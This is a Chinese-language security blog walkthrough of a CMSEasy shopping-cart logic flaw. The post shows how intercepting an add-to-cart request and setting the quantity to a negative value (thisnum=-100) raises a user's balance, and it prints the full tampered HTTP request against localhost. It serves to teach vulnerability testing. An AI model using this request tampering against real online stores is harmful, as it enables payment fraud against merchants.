CMSEASY邏輯漏洞思路剖析

本週分享知識星球裏面的cmseasy邏輯漏洞,裏面涉及了抓包教程比較簡單,適合新手練習。這次跟大家分享其中的思路。

本文作者:付聰(MS08067安全實驗室核心)

CMSEASY邏輯漏洞

登錄任意賬戶:

點擊任意產品: 

點擊任意一個產品,前提是有餘量:

輸入任意正常數量,burp開啓抓包,點擊添加購物車:

將抓到的包中的最後一個數字改成負數:

然後放包

GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1
Host: localhost
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://localhost/index.php?case=archive&act=show&aid=527
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoN
Connection: close

此時可以看到購物車中爲負數:

查看個人中心中的餘額,爲5600:

點擊購物車:

點擊下圖內容:

填寫完成之後,點擊在線支付:

十一

選擇餘額支付,點擊購買:

十二

購買成功:

十三

回到個人中心,可以看到餘額的變化:

掃描下方二維碼加入WEB安全星球學習

加入後會邀請你進入內部微信羣,內部微信羣永久有效!


目前25000+人已關注加入我們


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章